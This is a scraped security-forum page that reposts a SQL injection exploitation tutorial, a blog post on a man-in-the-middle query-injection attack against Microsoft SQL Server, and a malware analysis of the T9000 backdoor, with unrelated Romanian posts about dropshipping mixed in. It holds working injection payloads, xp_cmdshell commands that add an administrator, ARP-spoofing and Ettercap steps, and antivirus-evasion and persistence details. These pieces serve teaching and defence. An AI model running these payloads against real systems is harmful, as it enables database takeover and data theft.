Leaderboard

SQL Injection: Exploitation Published on February 9, 2016 By HollyGraceful on Injection, OWASP Top 10, Web Application Security Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise. SQL and a SQL Injection Primer For those less familiar with SQL it is a language used for storing, retrieving, modifying and removing data from a database. It can often also be used to read or modify files on the remote system and execute operating system commands. There are many variations such as Microsoft SQL, MySQL or PostgreSQL. There are different query types in SQL, such as SELECT, INSERT, UPDATE and DELETE as well as the idea of “Stored Procedures”. These are used for retrieving data from the database (SELECT), adding new rows to a table (INSERT), taking a table row and modifying it (UPDATE) or removing rows from a table (DELETE). There are many different stored procedures however an interesting one is the MSSQL procedures xp_cmdshell which can be used for executing commands on the remote database host. SELECT Statements retrieve data from the database and look like: SELECT column FROM table WHERE condition is true For example the following could be used for a login system: SELECT username,password FROM users WHERE username='$INPUT1$' AND password='$INPUT2$'; Where $INPUT1$ and $INPUT2$ is text taken from the user of the application. Statements are separated by semi-colons, so two statements could be “stacked” and executed one after the other by separating them with a semi-colon. Developers can add comments into a statement by preceding the comment with a ” −− ” before the comment, which makes the SQL parser ignore any following text. The above statement concatenates user input into the query and is therefore vulnerable to SQL injection, as an attacker can simply add characters within $INPUT1$ or $INPUT2$ to alter the logic of the statement. Taking this into account an attacker could utilize the following payload for INPUT1 to cause a login bypass: x’ OR 1=1 −− This works as the input would change the command to the following: SELECT username,password FROM users WHERE username='x' OR 1=1 -- ' AND password='$INPUT2$'; As you can see from the above, the double dash has caused the password check to be “commented out” so that it has no effect. Also if you remember back to the first SQL command I showed highlights that the SELECT statement evaluates the WHERE clause to determine if it is a Boolean true. That’s what the OR 1=1 part of the input achieves, as one always equals one. The effect on many applications that are vulnerable to SQL injection in the login form is that all account data will be returned and the database will simply log in the attacker in as the first user in the database. As you can see the attacker has altered the intended logic of the statement and they could use this to bypass authentication, cause the database to leak confidential information or even execute functions such as executing operating system commands. Many times it can be tempting to leave SQL exploitation down to automated tools, but I recommend all juniour Penetration Testers get as deep into manual exploitation as they possible can so that they can really understand what the tool is up to, especially in preparation for the day that the tool fails and you’ve got to crack a can of caffeine and do it all manually. Detecting Vulnerable Functions Detecting SQL injection is fairly simple if errors are enabled and displayed in raw form to the user. If an attacker adds an apostrophe the the input it will cause an unbalanced number of quote marks and an error like “You have an error in your SQL syntax” will be shown, great you have a valid SQL injection point, however if errors are customized or simply not rendered to the user then you have to try a little harder! the most effective way to do this is to alter the query in such a way that it could only possibly be that you have successfully injected into SQL. So very SQL-like syntax being parsed in the expected way. Consider he following query which loads a news article from the database to display on an fictitious web application: SELECT id,title,content FROM tblArticles WHERE id=$input Which is accessed through the following URL: http://sql.example.org/news?id=100 Now a simple way to determine is the parameter “id” is vulnerable to injection would be would be to try the following URLs and see how the server reacts: http://sql.example.org/news?id=100 http://sql.example.org/news?id=101 http://sql.example.org/news?id=101-1 If the server is appropriately vulnerable it would be expected that the first and second URL show different articles whereas the third one is evaluated by the database and produces the same output as the first URL. If the statement 101-1 is not evaluated then there’ll be a notable change in output. The above example, obviously, will only work on integer inputs, if the id parameter was instead a string input like this: http://sql.example.org/news?page=example With the above case it’s possible to utilize string concatenation in a similar way, where if the string is evaluated and concatenated then the output should not change whereas if it is no evaluated then a noticeable change in output will occur. The method of concatenation differs between back-end database types however if one works you have the added benefit of fingerprinting the database type! MSSQL: exa'+'mple With URLs a + is space, use %2b instead (URI encoded plus sign)! MySQL: exa' 'mple (that's a space between two apostrophes) Oracle: exa'||'mple An additional way of detecting of detecting functions that are vulnerable is to concatenate a simple conditional at the end of the input, such as: AND 1=1 -- AND 1=2 -- The idea with these payloads is that the top option of 1=1 will not alter the logic of the query in anyway (as 1 does in fact equal 1) although the second payload will break the query and therefore the application would operate in a noticeably different way, such as missing text on the page (and therefore a shorter content length), a faster response time, a visible error or a different status code. The application should also have the same effect regardless of what the conditional was, so 1=1, 2=2 and 3=3 should all have the same effect, as should payloads such as: AND (SELECT @@version)=(SELECT @@version) -- The above payload is useful because its very SQL-like and whilst there may be some application logic which interprets 1=1 it’s very unlikely that outside of a SQL injection context you’ll get the same response from the above payload. It’s important to note however, that this payload is vendor specific, so the above will work on MSSQL and MySQL but not PostgreSQL. There’s a suitable payload for each of the backends however. The PostgreSQL equivalent would be: AND (SELECT version())=(SELECT version()) -- Types of Injection Whilst the above example is a simple demonstration of SQL and how injection can be use to the benefit of an attacker, as the attacker has the full flexibility of SQL at their disposal there is much more that they can do than simply bypassing an application’s login form. There are different types of injection covered within this article are: Boolean Error Union Stacked Time In terms of injection it’s not exactly a case of preference but simply what is available in the context of the vulnerable parameter. You’ll definitely prefer to find Union or Error based over Boolean and Time based due to the effort levels required to exploit them but you’ll have to deal with what you’re given when it comes down to it. Different injection types will be available depending on the original query which you are injecting into as well as any filters that are in place to prevent malicious input. Exploitation There are five injection types and I’ll cover them each in turn, once you get the hang of the first however the others operate much as you’d expect but I’ll run through a full working example of each to make sure there’s no important details missed out, plus it’ll show how I generate payloads and build up from detection to data exfiltration. Error Based Error-based SQL injection comes about when errors from the SQL database are exposed to the attacker by being embedded in application responses. Detection is generally as simple as placing an apostrophe in the parameter an you’d receive an error along the lines of: Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string The exact error depends on the backend database. These errors can be controlled and by crafting input you can cause the error to contain data from the database itself. For example, if you are injecting into an integer input you can cause a type clash which will disclose information like this: AND 1 in (SELECT @@version) with input like this you’ll get an error along the following lines: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) (Hypervisor)' to data type int. This works as the database attempts to convert the string to an integer, cannot, and throws an error that reveals the information. This means that an attacker can place any select statement that returns a string within the brackets of the payload and the error will contain the desired output. However it’s a touch more complex if you’re injecting into a string, but only a touch. As you couldn’t cause a cast error by converting to an integer you can expand the payload to be something along these lines: AND 1 IN (SELECT 'Extract:' + CAST((SELECT 1) as varchar(4096))) -- Here you can replace (SELECT 1) with the SQL statement you would like to execute and retrieve the contents from. The way that this injection works is to concatenate the desired data onto the end of the string “Extract” and then attempts to cast that to an integer which causes an error, so in the case of the example the resulting error would be: Error Type: Microsoft SQL Native Client (0x80040E07) Conversion failed when converting the varchar value 'Extract:1' to data type int. So an attacker can effective run arbitrary SQL statements and capture the output easily if errors are embedded within the application. If errors are gracefully handled however this doesn’t stop an attacker completely, they just have to use a different injection technique. Union Based The UNION operator allows two or more SELECT statements to be combined, the idea being that a developer may run a query such as listing all of the products available in a store and an attacker can combine this with an additional query, such as listing all of the usernames and passwords in the customers table. To utilise a union though the attacker must request the same number (and type) as the original query and therefore needs to know how many columns are being used. There are two ways to do this, the first is to use NULLs in place of the columns to determine how many columns there are, such as: UNION SELECT NULL -- UNION SELECT NULL, NULL -- UNION SELECT NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL -- …and continue until you’ve determined how many columns there are – if you get the incorrect number of columns an error condition will occur and if you get the right number then the application will run unhindered. You can then swap out the NULL with datatypes to determine which ones are correct, such as: UNION SELECT 'abcd', NULL, NULL, NULL -- UNION SELECT 1, NULL, NULL, NULL -- Work them out one at a time until you end up with something like this: UNION SELECT 1, 'string', 'string', 'string' -- At this point you have a working SELECT statement where the output will be appended to the normal output the application gives! If you’ve got a lot of columns and writing out all of those NULLs is too much like hard work there’s another method of doing the original column count enumeration, using ORDER BYs. If you attempt to order by a column number which is higher than the number of columns it’ll throw an error. So you can start low and work up until you see an error: ORDER BY 1 -- ORDER BY 2 -- ORDER BY 3 -- ORDER BY 4 -- Blind Boolean If the application gracefully errors, and it’s not possible to combine queries with UNION, then an attacker can use inference to determine the answer to queries about the database. The payloads we used earlier to prove the existence of injection are simple examples of this: AND 1=1 -- AND 1=2 -- Essentially these are asking yes or no questions of the database and the result shows the answer. “Does 1=1?” Yes of course it does and therefore the normal output of the application will be visible. “Does 1=2”? No it does not and therefore there should be a noticeable chance, this could be in the response length, time of execution, or HTTP response code (just like before). However we can expand up on this idea to ask more in-depth questions of the database, as long as we can phrase them as Yes/No questions. For example, “Is the first letter of the current user the letter ‘a'”? That’d look something like this: AND SUBSTR(SELECT user_name(), 1, 1)='a' -- We can cycle through: b, c, d, e until we get a “true” response – then move on to the second character and so on. A time consuming and request intensive process but it can be automated quite easily with python (or Burp Intruder!) Time-Based Blind If the application does not embed responses so you can’t use UNION, if it doesn’t show error messages an it’s not possible to determine the output of a boolean then there is still hope! If you can’t infer the output to a boolean through application responses you can add a notable difference yourself through time delays. Effectively using IF statements and delays you can ask the application “Does A=A? If so, please delay your response by five seconds and if not then immediately respond”. Then by detecting lag in the response you’ll get your answer! Simple…but very time consuming… A payload like this will work for MSSQL: IF('a'='a') WAITFOR DELAY '0:0:5' -- Then you can simply replace the ‘a’=’a’ with whatever yes/no question it was that you’d like to ask. Stacked Queries (and possibly command execution!) A final thing which is worth noting, is that it may be possible to close off the developers query and start a completely new query from scratch, something as simple as: ; WAITFOR DELAY '0:0:5'; -- If this works you’ll get a delay as you did in the previous example, however as you’re able to execute new full queries it is also potentially possible to execute stored procedures – such as xp_cmdshell on MSSQL. This stored procedure allows for the execution of operating system commands on the database server. There are two problems. The first problem is, on modern MSSQL servers xp_cmdshell is disabled by default…but you can re-enable it through SQL Injection! The second problem is that to execute this procedure, you probably need to be running as the sa user. If you’re lucky those and you are sa, here’s the steps to execute OS commands: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Now that’s done, you can go ahead and use the xp_cmdshell: exec master..xp_cmdshell 'dir c:\'; -- That’ll execute the dir command! One…small hitch…the output of the command isn’t returned…an easy way to get around that would be to just attack the application blind, for example: exec master..xp_cmdshell 'net user foobar Password123 /add'; -- exec master..xp_cmdshell 'net localgroups "Administrators" /add'; -- The above command adds a new local administrator to the remote server. That might help. Alternatively you can redirect the output of the executed command to a database table and read the contents of the table through SQL injection! You can create a table and store the output of a command to it with the following: ; create table #output (id int identity(1,1), output nvarchar(255) null); ; insert #output (output) exec @rc = master..xp_cmdshell 'dir c:'; Then to read the contents out with a SELECT statement like this one: ; select * from #output where output is not null order by id; A quick note on filter evasion… If there’s a filter in place to prevent the execution of payloads above then there are a few things to try. First of all be aware that you can flip case without any problem: SELECT sElEcT Also if whitespace is filtered, then you can replace spaces with comments for the same effect: AND 1=1 -- /**/AND/**/1=1/**/-- Finally if you can’t comment out the end of a query you can “gracefully close” the statement instead: ' AND 1=1 -- ' AND 1=1 OR 'a'='a Defending against Injection As I said at the start of this article the issue really is that user input is insecurely concatenated into a query. So there’s two things to note here, the first is concatenation and the fix here is instead to use “parametrized” or “prepared” statements, these are available in all modern languages and frameworks, these effectively separate the query from the user input so that the database cannot mix the two up and effectively stop SQL injection attacks on their own. An example for PHP can be found in the PHP documentation here, which gives a flavour of the general idea. However another thing to consider, to stop other kinds of injection and web application attack, it’s a good idea to consider filtering all user input. I’ve written about user input filtering tactics here. Sursa: https://www.gracefulsecurity.com/sql-injection-exploitation/

Fac mai bine ca la job, insa nu sunt gata sa renunt, iti dai seama ca maine poate sa nu imi mai mearga sau se distribuitorii mei sa nu aiba marfa etc... iar jobul meu tot imi ofera undeva la 900 de euro ceea ce e acceptabil in RO. Intai strang imi creez o baza, capat cunostinte si apoi o sa las si jobul.

By Rick Osgood | February 5, 2016 During a recent penetration test, I was performing some packet captures and noticed some unencrypted Microsoft SQL Server (MSSQL) traffic. The syntax was unmistakable. At first I thought this might be a way to capture some authentication credentials. However, MSSQL encrypts login traffic which meant I would have to crack the encryption to get credentials. If the installation uses a self-signed certificate, that is fairly easy to crack. Unfortunately, for this particular client engagement, cracking SQL Server encryption was beyond the scope of the project. So, I had to set my curiosity aside for the time being and complete the penetration test for the client. However, I could not help thinking I was on to something. Was there a way to attack a SQL Server box without any credentials? I decided to take my hypothesis to the lab and try some experiments. What I found was that with a little packet hacking, I could take control of a Microsoft SQL Server box without having any stolen credentials using a Man in the Middle style attack. Man in the Middle Back in my lab, I began to research this more. For my investigation, I was running MSSQL Server 2014 Express on Windows Server 2012 R2. The client machine was a Windows 10 system running MSSQL Management Studio 2014. My attack machine was a relatively new installation of Kali 2.0 Linux. All of these systems are on the same subnet, simulating an attacker on the internal network. This was nearly identical to the setup I had at the client site. This type of attack is known as a man-in-the-middle (MITM) attack. Anitian does these a lot, as we have a lot of expertise on hacking infrastructure devices. The typical setup is to perform some kind of redirect, like an ARP cache poison (which is still possible in some environments), which forces traffic between two systems to be redirected through the attacker’s computer. This allows the attacker to not only see all of the data between the victims, but potentially also to manipulate that traffic. This was exactly what I wanted to do. Understanding the Data The first thing I needed to do was to look at the MSSQL query traffic. In order to make this test more interesting, I used the “SA” account to login. The SA account is the system admin account in SQL Server and can do anything. If my experiments were successful, I could do a lot of fun things with the SA account’s privileges. Once logged in, I launched Wireshark 2.0 on the SQL Server box. It started capturing traffic on the primary interface. I configured Wireshark to use a display filter “tds.query”. This hides all the other traffic and displays just the TDS query packets. (Incidentally, I noticed that the “tds.query” filter object is not available on older versions of Wireshark.) With a traffic capture underway, I switched back to the workstation and executed a query against the sample database I built for this test. The database is called testdb and includes one table called Products. The Products table has two columns named ProductID and ProductName. There is no actual data in the table, but for this test that is unnecessary. This query is designed to pull all information from the database table. The query was executed successfully and the empty table was returned to me. You can see the empty columns listed toward the bottom-right of the screenshot. Switching back to Wireshark, I stopped the capture and looked at the captured data. I spotted one TDS query packet. Clicking on that packet showed me all of the data contained within. MSSQL Server 2014 Express did not have encryption enabled by default, so this data was easy to access. Looking at the decoded data at the bottom of the center pane, it is easy to identify the query. It even includes the carriage return and newline characters. Something interesting to notice is that in between each character of the query is a null byte (hexadecimal 0x00) which is normal for Unicode. This is only noticeable when looking at the raw data in the bottom pane. Wireshark displays these bytes as period characters but really, they are null. This meant that I couldn’t just look for a simple string like “select”. I’d have to take those Unicode null bytes into consideration when searching for the data later, and for when I ultimately try to replace it with my own data. Fun with Ettercap Filters Now that I knew what the data looked like, I could try to find a way to manipulate it. I decided to use Ettercap. Ettercap is a tool specifically designed to perform MITM attacks. It also has a nifty built-in feature called Ettercap filters. A filter would allow me to search the packets for specific data and then manipulate that data. You just write the filter and load it into Ettercap. Then Ettercap automatically replaces data every time it finds a match. The functionality is somewhat limited, but it should work for proof of concept. The filters are written in a simple scripting language. The important functions I intended to use were the search and replace functions. The search function will search for specific data within the packets. The replace function will actually search for data and then replace it with other data. That was the key to this project. Since the TDS query data includes those null bytes, some of the characters are not printable. This meant that I could not merely search for a simple string and replace it with another string. I needed a way to search for a non-printable null byte. Since I cannot type null on a keyboard, I needed another way. Fortunately, Ettercap filters support hexadecimal using “\x” to escape. For example, to search for the letter ‘s’, I can tell Ettercap to search for “\x73”. The null bytes are easily searchable now by searching for “\x00”. Kali includes a program called hexdump that can be used to convert strings to hexadecimal. I used this to convert the string “select” to hex. Once I had the data I needed, I wrote the first test filter and called it “mssql.filter”. The first line ensures that the filter will only run on TCP traffic with a destination port of 1433. If this matches, the filter will output a debugging message to the console to let me know that it found SQL traffic. This is just for my own peace of mind so I know it’s at least partially working. The next “if” statement searches for a string of hex data. This data translates to “select” with null bytes in between each character. If the filter locates that string, it will output another debugging message to the console. Finally, the magic happens. The replace command swaps that exact string with a different string of “ssssss” including the required null bytes. This was just a test to see if the script would run properly. It is important to note that when you replace data in a TCP packet, you must replace it with the exact same number of bytes. If the size of the packet changes, the TCP connection will break. Once the filter is written, it must be compiled. This is easily accomplished with the etterfilter command. There were no errors, so the filter was now ready for testing. I fired up the Ettercap graphical interface and launched an ARP spoofing attack against the MSSQL server and the client workstation with sniffing enabled. I fired up Wireshark and verified that I was seeing traffic being sent between the two victims. Then in Ettercap I went to “Filters -> Load a filter” and chose my filter. I was rewarded with a “Content filters loaded” message down in the Ettercap console. Almost immediately I was receiving “SQL Traffic Discovered” messages as well. Everything was looking positive. The next step was to switch back to the workstation and try executing the query. If it goes according to plan, the “select” string should be replaced with “ssssss” and break the query. I executed the query, but this time I did not receive the empty table result like I did originally. Instead, I received an error. “Incorrect syntax near ‘ssssss’.” That’s perfect! The filter worked exactly as expected. It replaced the “select” string with “ssssss”. The MSSQL server did not know how to handle that and returned an error. That was one step in the right direction. The next step was to replace the entire query string with something that will help me as the attacker. Create the Login I decided to try to add a login to the server. This would be pretty much the best possible scenario for me as an attacker, especially since in this case the workstation victim is logging in as the SA user. In order to add a login, I would have to submit this query to the MSSQL server: CREATE LOGIN anitian WITH PASSWORD=’YouGotHacked1#’; This would add a user to the MSSQL server called “anitian” with the password “YouGotHacked1#”. After converting everything to hex, I updated the mssql.filter file to contain the new data. This filter will search for the string “select ProductID, ProductName from Products where ProductID=1;” and then replace it with the string “CREATE LOGIN anitian with PASSWORD=’YouGotHacked1#’”. I mentioned earlier that you must replace TCP data with the exact same amount of data. So how did I handle that since my new query is shorter than the original? I just added some spaces to the end of my new query with the null bytes surrounding them. This would ensure that the TCP packet stayed the same size, but the spaces wouldn’t interfere with my query being executed successfully. I compiled the filter just like before and then loaded it up into Ettercap. Then I submitted the query from the workstation. Notice the difference between this response and the response before I used the Ettercap filter? Originally, the query returned an empty table. This time, no table was returned. Instead, the server returned a message, “Command(s) completed successfully.” If a database administrator saw this, they would likely dismiss it as some strange error. Unfortunately, they would be too late. I just added my own account to the database system. Now, the real hack was about to take place. From the Windows 10 workstation I logged out of the SA account and then attempted to log in using my (hopefully) newly created anitian account. SUCCESS! I was now logged in with my own account. Unfortunately this account did not have a lot of rights, so I could not do much. However, that could be solved. The next step would be to prepare another Ettercap filter to adjust my account’s rights and then perform a second SQL query injection attack. At this point, I could have easily done all this, but it is rather tedious to do all the hex conversions by hand, and then add all of those null bytes and such. Who wants to go through all of that effort? This was a good enough proof of concept right? No way! I was not about to give up that quickly. Besides, why do all that tedious work, when I can automate the entire process using a script! Automating the Hack The SQLinject.sh shell script can be downloaded here: http://pastebin.com/Nge9rx7g This script automates the entire process from converting the SQL queries to hex all the way to performing the ARP spoofing and loading the Ettercap filter. It makes the process extremely easy. In order to use the script you need four pieces of information. The IP address of the MSSQL server The IP address of the MSSQL client The original query you want to replace The new query you want to inject In this case, I already knew everything except for the SQL query I wanted to inject. I knew I wanted to give the anitian user sysadmin privileges. After a quick lesson in SQL commands, I was able to design with the correct query: ALTER SERVER ROLE sysadmin ADD MEMBER anitian; This would add my new anitian user to the sysadmin role on the server, giving me access to pretty much anything I want. Now that I had all four key pieces of information, I ran the script like this: ./SQLInject.sh –o “select ProductID, ProductName from Products where ProductID=1;” –i “ALTER SERVER ROLE sysadmin ADD MEMBER anitian;” –s 192.168.1.114 –c 192.168.1.100 –f mssql.filter Using the script, I do not have to worry about those pesky hex conversions or null bytes. The script handles it all for me. It will perform the conversions and then output an Ettercap filter to mssql.filter (The filename is based on the –f flag). From there, it runs etterfilter and compiles the filter into mssql.filter.ef. Finally, the script even loads up the command line interface to Ettercap, performs the ARP spoofing attack against the server and workstation and loads the filter! It will even compare the length of the old query and the new query and warn you if the new query is too long. And if the queries are not an identical length, it will pad the new one with spaces to make them identical in length! One single command does everything for me. I executed the script and then switched over to the workstation. I then ran the familiar select query and noticed that I once again received the “Command(s) completed successfully” message. This was a good sign for the attack. I logged out of the SA account and logged back in as anitian. Ta da! You can see in the screenshot that the anitian account is now a sysadmin user. With this level of access I can do whatever I want with the system. It gives me a great pivot point to start attacking other systems on the network. Of course, that assumes this database does not already contain what I am looking for like payment card numbers or personally identifiable information. The biggest downfall to this script is that it requires you to know the original SQL query before it actually happens. Luckily, SQL servers often have batch jobs or queries that are executed regularly or on a set schedule. Watching a Wireshark capture over a period of time should result in at least one query you can target. Of course I could always turn this into a more full-fledged program that performs the MITM attack on its own and then actually proxies the traffic, searching for TDS query packets by type and then automatically replacing the data without the need to know the original query beforehand…but that’s a project for another day. Defending Against SQL MITM Attacks Man in the middle attacks such as this can be devastating. As you can see, I was able to gain complete access to a critical system. A focused hacker may not follow some of the scientific processes I did. Moreover, they could automate this and do it repetitively for hours or days, waiting for just the right conditions. The simplest way to prevent this attack is to require encryption on all database connections. However, merely enabling encryption might not be sufficient. Clients can negotiate the connection with no encryption if it is not required. Also ensure that you use a valid, trusted certificate. An attacker could easily spoof a self-signed certificate. Another defense is to ensure remote queries never use accounts with elevated privileges, such as the SA account. All database queries, especially the programmatic ones, should use an account with the absolute least amount of access they need to do the job. This ensures that if the attacker is able to take over a connection, they cannot use that connection to forge accounts, like I did in this test. Lastly, ensure your infrastructure is patched regularly. Also, segment and isolate database systems from the corporate network. These are best practices that also make MITM type attacks very difficult (if not impossible) to execute. Sursa: https://blog.anitian.com/hacking-microsoft-sql-server-without-a-password/

Salut, Am mai discutat acest subiect, cred ca unele topicuri s-au pierdut din pacate, dar update-ul forumului este de bun augur, articole se pot scrie oricand. Pentru cei care mi-ati scris in ultima vreme aici, pe skype, facebook etc, incerc sa va raspund aici, forumul fiind public, poate ii ajuta si pe altii. Nu o sa reiau ce fac si cum fac, o sa incerc sa raspund la cateva intrebari. 1) Ai nevoie de firma pentru a incepe un business in dropshipping ? Daca vrei sa fie o chestie serioasa, iti recomand sa iti faci una, la inceput nu o sa iti trebuiasca, dar cu timpul o sa tranzactionezi din ce in ce mai multi bani si o sa ai nevoie de o firma, paypalul o sa puna intrebari si o sa devina stresant. 2) De ce cunostinte ai nevoie ? De utilizare a calculatorului si de limba engleza medie. E nevoie intradevar de un magazin online dar se gasesc 100000+ tutoriale nu iti trebuie cunostinte, sau poti folosi shopify ! 3) De unde iau produsele ? De oriunde ! Asta daca nu detii o companie. Daca ai o companie, ceea ce iti si recomand, suplieri se gasesc : sunt marketuri pentru asa ceva, un exemplu este Doba. Daca nu ai firma si totusi cauti un suplier, poti arunca un ochi aici : http://www.blackhatworld.com/blackhat-seo/f68-dropshipping-wholesale-hookups/ 4) Cat timp iti trebuie, eu am si servici..si... Si eu, da si eu am un job, intradevar e mai lejer dar am un program de 8 ore si totusi reusesc cumva sa ma ocup si de droipshipping. Prefer sa am si un job dar sa muncesc si la afacerea mea, pana strang destuii bani sa investesc in ceva mai bun, sau sa extind deja ceea ce am. 5) Am site, am tot planificat dar nu am cui sa vand ! Metoda cu bani + rapida : Dai bani ca sa faci bani ! = Facebook Ads, Google Adwords, campanii SEO. Metoda fara bani : pagini in social media -> distribuirea in toate grupurile din nisa ta + grupurile de tip "Buy & Sell", follow 4 follow, pin, etc...depinde de retea. Seo -> cred ca poti optimiza tu paginile fara ajutorul cuiva, sunt mult prea multe informatii pe internet, apoi poti incepe pasiv sa iti creezi si backlinkuri, semnale sociale, etc. 6) Ce sisteme de plati folosesti ?! Inainte de a avea firma foloseam doar paypal, pentru ca ofera celor care nu au un cont sa plateasca si cu cardul, acum am o firma si am integrate mai toate sistemele : Cu cardul, paypal, western etc. 7) Cat sa cresc pretul produselor ?! Formula mea : PRETUL PRODUSULUI + PRETUL CELUI MAI RAPID SHIPPING + 20 - 40 % - asta depinde si de valoarea produsului. 8) Ce fac daca cineva imi cere date de contact ?! Ai crescut in pestera ? Sau deh poate esti mut, atunci te inteleg, daca nu se aplice acestea, te duci frumos pe skype, iti cumperi un nr de telefon de la ei, il redirectezi catre nr tau de telefon si vorbesti cu oameni. 9) Ce fac daca nu stiu engleza ?! Pas ! 10) Cat profit faci si cat de repede ai inceput sa castigi bani ? Fac destul altfel nu ma tineam de business si nu imi faceam o companie pentru aceste lucruri. Cat de repede? Eu din prima zi pentru ca aveam cateva conturi de social media deja setate pentru aceste lucruri. 11) Poti sa imi dai un link cu siteurile tale si / sau paginile tale ?! NU. Acestea sunt cele mai comune intrebari care le primesc, dropshippingul e in ochii tuturor, nu e secret, toti il puteti face, asta ca sa nu mai spuneti ca nu se pot face bani pe internet! Cum spunea un bun prieten al meu ": Bani adevarati pe internet se fac din intermediere de servicii....ala are produsul, tu il vinzi, punct. Numai Bine si spor la bani !

T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques POSTED BY: Josh Grunzweig and Jen Miller-Osborn on February 4, 2016 1:00 PM FILED IN: Malware, Threat Prevention, Unit 42 TAGGED: Skype, T5000, T9000, Trojans Most custom backdoors used by advanced attackers have limited functionality. They evade detection by keeping their code simple and flying under the radar. But during a recent investigation we found a backdoor that takes a very different approach. We refer to this backdoor as T9000, which is a newer variant of the T5000 malware family, also known as Plat1. In addition to the basic functionality all backdoors provide, T9000 allows the attacker to capture encrypted data, take screenshots of specific applications and specifically target Skype users. The malware goes to great lengths to identify a total of 24 potential security products that may be running on a system and customizes its installation mechanism to specifically evade those that are installed. It uses a multi-stage installation process with specific checks at each point to identify if it is undergoing analysis by a security researcher. The primary functionality of this tool is to gather information about the victim. In fact, the author chose to store critical files dropped by the Trojan in a directory named “Intel.” T9000 is pre-configured to automatically capture data about the infected system and steal files of specific types stored on removable media. We have observed T9000 used in multiple targeted attacks against organizations based in the United States. However, the malware’s functionality indicates that the tool is intended for use against a broad range of users. In this report, we share an analysis of each stage in T9000’s execution flow. Stay tuned for a future report in which we will provide more detail on how this tool has been used and the infrastructure we have identified as part of our analysis. T9000 Backdoor Analysis The entire execution flow of the malware is represented in the following diagram: As this malware uses a multistage execution flow, we’ll discuss each stage individually. Initial Exploitation The sample of T9000 used in this analysis was originally dropped via a RTF file that contained exploits for both CVE-2012-1856 and CVE-2015-1641. When triggered, an initial shellcode stage is run, which is responsible for locating and executing a secondary shellcode stub. The second stage shellcode reads the initial RTF document and seeks to the end of the file, using the last four bytes as the size of the embedded payload. With the payload size confirmed, the shellcode will create a file in the %TEMP% folder using a temporary filename. The shellcode will decrypt and subsequently load the embedded payload in the RTF file. The decrypted payload is written to the temporary file and executed using WinExec. The shellcode then attempts to decrypt an embedded decoy document with the same algorithm used to decrypt the payload, which it will save to %TEMP%\~tmp.doc path. This file is opened using the following command: cmd /C %TEMP%\~tmp.doc However, this particular sample did not contain a decoy document. Stage 1 When this temporary file is initially executed, it will begin by creating the following mutex to ensure only one instance of the malware is running at a given time: 820C90CxxA1B084495866C6D95B2595xx1C3 It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\Software\ registry path: Sophos INCAInternet DoctorWeb Baidu Comodo TrustPortAntivirus GData AVG BitDefender VirusChaser McAfee Panda Trend Micro Kingsoft Norton Micropoint Filseclab AhnLab JiangMin Tencent Avira Kaspersky Rising 360 These security products are represented by a value that is binary AND-ed with any other products found. The following numbers represent each respective security product. 0x08000000 : Sophos 0x02000000 : INCAInternet 0x04000000 : DoctorWeb 0x00200000 : Baidu 0x00100000 : Comodo 0x00080000 : TrustPortAntivirus 0x00040000 : GData 0x00020000 : AVG 0x00010000 : BitDefender 0x00008000 : VirusChaser 0x00002000 : McAfee 0x00001000 : Panda 0x00000800 : Trend Micro 0x00000400 : Kingsoft 0x00000200 : Norton 0x00000100 : Micropoint 0x00000080 : Filseclab 0x00000040 : AhnLab 0x00000020 : JiangMin 0x00000010 : Tencent 0x00000004 : Avira 0x00000008 : Kaspersky 0x00000002 : Rising 0x00000001 : 360 So, for example, if both Trend Micro and Sophos were discovered on a victim machine, the resulting value would be 0x08000800. This numerical value is written to the following file: %APPDATA%\Intel\avinfo The malware proceeds to drop the following files to the %APPDATA%\Intel directory: Additionally, the following two files are written to the Data directory: The following table provides a description of each file dropped: File Name Description ~1 Debug information about files used by malware. avinfo Installed security products on victim. hccutils.dll Malicious DLL. Loads ResN32.dll. hccutils.inf Malicious INF file. Points to hccutils.dll. hjwe.dat Encrypted core of malware family. igfxtray.exe Legitimate Microsoft executable. Loads hccutils.dll. qhnj.dat Encrypted plugin. Hooks a number of functions and logs results. QQMgr.dll Malicious DLL. Sets persistence via Run registry key. QQMgr.inf Malicious INF file. Points to QQMgr.dll ResN32.dat String pointing to path of encrypted core of malware. ResN32.dll Malicious DLL. Decrypts, decompresses, and loads core malware. tyeu.dat Encrypted plugin. Takes screenshots and collects Skype information. vnkd.dat Encrypted plugin. Finds files on removable drives on victim machine. dtl.dat Encrypted configuration information. glp.uin Plugin configuration information. You’ll notice that QQMgr* files are not listed in the original malware execution flow diagram. In the event the victim is running any of the following operating system versions, as well as either Kingsoft, Filseclab, or Tencent security products, the malware will be installed using an alternative method. Windows 2008 R2 Windows 7 Windows 2012 Windows 8 In such a situation, the malware will find and run the built-in Microsoft Windows InfDefaultInstall.exe program, which will install a DLL via an INF file. Should Tencent be installed, the malware will execute the InfDefaultInstall.exe program with an argument of ‘QQMgr.inf’. Otherwise, it will use ‘hccutils.inf’ as an argument. QQMgr.inf will install the QQMgr.dll, while hccutils.inf will install the hccutils.dll library. QQMgr.dll will set the following registry key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Eupdate – %APPDATA%\Intel\ResN32.dll The QQMgr.dll file has the following debug string found within it: H:\WORK\PROJECT\InfInstallBypassUAC\Release\BypassUAC.pdb The hccutils.dll file is described later within this post. After the malware drops the required files, by default the malware will spawn %APPDATA%\Intel\igfxtray.exe in a new process, which begins the second stage of the malware’s execution. Stage 2 The igfxtray.exe is a legitimate Microsoft Windows executable that sideloads the malicious hccutils.dll DLL file. This DLL has the following debug string embedded within it: D:\WORK\T9000\hccutils_M4\Release\hccutils.pdb Upon loading this malicious DLL, the malware will initially perform the same queries for security products that were witnessed in stage 1. Three separate techniques for starting stage 3 are used depending on the properties of the 